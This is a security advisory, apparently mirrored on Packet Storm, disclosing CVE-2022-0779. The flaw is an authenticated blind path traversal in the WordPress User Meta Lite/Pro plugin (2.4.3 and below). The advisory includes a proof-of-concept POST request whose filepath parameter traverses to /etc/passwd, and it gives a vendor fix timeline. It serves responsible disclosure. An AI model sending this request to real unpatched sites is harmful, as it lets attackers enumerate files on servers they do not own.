what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress User Meta Lite / Pro 2.4.3 Path Traversal

WordPress User Meta Lite / Pro 2.4.3 Path Traversal
Posted May 30, 2022
Authored by Julien Ahrens | Site rcesecurity.com

WordPress User Meta Lite and Pro plugin versions 2.4.3 and below suffer from a path traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2022-0779
SHA-256 | 9f5dfc7d061a12ed0156906753e063fd8b488898a8f4b2709039a9ee6f78125f

WordPress User Meta Lite / Pro 2.4.3 Path Traversal

Change Mirror Download
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product: User Meta
Vendor URL: https://wordpress.org/plugins/user-meta
Type: Relative Path Traversal [CWE-23]
Date found: 2022-02-28
Date published: 2022-05-24
CVSSv3 Score: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
CVE: CVE-2022-0779


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
User Meta Lite 2.4.3 and below
User Meta Pro 2.4.3 and below


4. INTRODUCTION
===============
An easy-to-use user profile and management plugin for WordPress that allows
user login, reset-password, profile update and user registration with extra
fields, all on front-end and many more. User Meta Pro is a versatile user
profile builder and user management plugin for WordPress that has the most
features on the market. User Meta aims to be your only go to plugin for
user management.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The WordPress ajax action "um_show_uploaded_file" is vulnerable to an
authenticated path traversal when user-supplied input to the HTTP POST
parameter "filepath" is processed by the web application. Since the application
does not properly validate and sanitize this parameter, it is possible to
enumerate local server files using a blind approach. This is because the
application doesn't return the contents of the referenced file but instead
returns different form elements based on whether a file exists or not.

The following Proof-of-Concept triggers this vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 147
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [your-wordpress-auth-cookies]
Connection: close

field_name=[your-field-name]&filepath=/../../../../../etc/passwd&field_id=[your-field-id]&form_key=[your-form-key]&action=um_show_uploaded_file&pf_nonce=[your-auth-nonce]&is_ajax=true


6. RISK
=======
The vulnerability can be used by an authenticated attacker to enumerate
local server files based on a blind approach.


7. SOLUTION
===========
Update to User Meta/User Meta Pro 2.4.4


8. REPORT TIMELINE
==================
2022-02-28: Discovery of the vulnerability
2022-02-28: WPScan (CNA) assigns CVE-2022-0779
2022-03-03: Contacted the vendor via their contact form
2022-03-06: Vendor response, acknowledgement of the issue
2022-03-18: Version 2.4.2 is released
2022-03-22: Vulnerability is still exploitable since fix was applied only client-side. Contacted vendor again.
2022-04-13: No response, contacted vendor again
2022-04-18: Vendor added a new fix to version 2.4.3. Asked to retest.
2022-04-19: Vulnerability is still exploitable due to a logic bug in the fix. Contacted vendor again.
2022-04-29: Vendor asks whether another fix in version 2.4.4 is fine
2022-05-16: Fix seems to work
2022-05-24: Public disclosure


9. REFERENCES
=============
https://github.com/MrTuxracer/advisories

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close